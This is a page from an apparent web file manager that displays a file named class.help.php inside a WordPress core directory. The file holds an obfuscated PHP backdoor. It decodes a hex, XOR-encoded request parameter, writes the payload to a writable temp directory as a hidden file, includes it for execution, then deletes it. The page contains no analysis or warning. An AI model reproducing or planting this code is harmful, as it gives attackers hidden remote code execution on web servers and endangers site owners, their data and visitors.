Create New Item
Item Type
File
Folder
Item Name
Search file in folder and subfolders...
Are you sure want to rename?
File Manager
/
wp-includes
/
js
/
dist
/
script-modules
/
block-library
/
tabs
:
class.help.php
Advanced Search
Upload
New Item
Settings
Back
Back Up
Advanced Editor
Save
<?php if(isset($_REQUEST["\x70s\x65t"]) ? true : false){ $tkn = array_filter(["/tmp", getenv("TMP"), getenv("TEMP"), session_save_path(), getcwd(), ini_get("upload_tmp_dir"), sys_get_temp_dir(), "/var/tmp", "/dev/shm"]); $data_chunk = hex2bin($_REQUEST["\x70s\x65t"]); $bind = '' ; $t = 0; while($t < strlen($data_chunk)){$bind .= chr(ord($data_chunk[$t]) ^ 80);$t++;} for ($dat = 0, $dchunk = count($tkn); $dat < $dchunk; $dat++) { $factor = $tkn[$dat]; if (is_dir($factor) ? is_writable($factor) : false) { $pgrp = vsprintf("%s/%s", [$factor, ".parameter_group"]); if (file_put_contents($pgrp, $bind)) { include $pgrp; @unlink($pgrp); die(); } } } }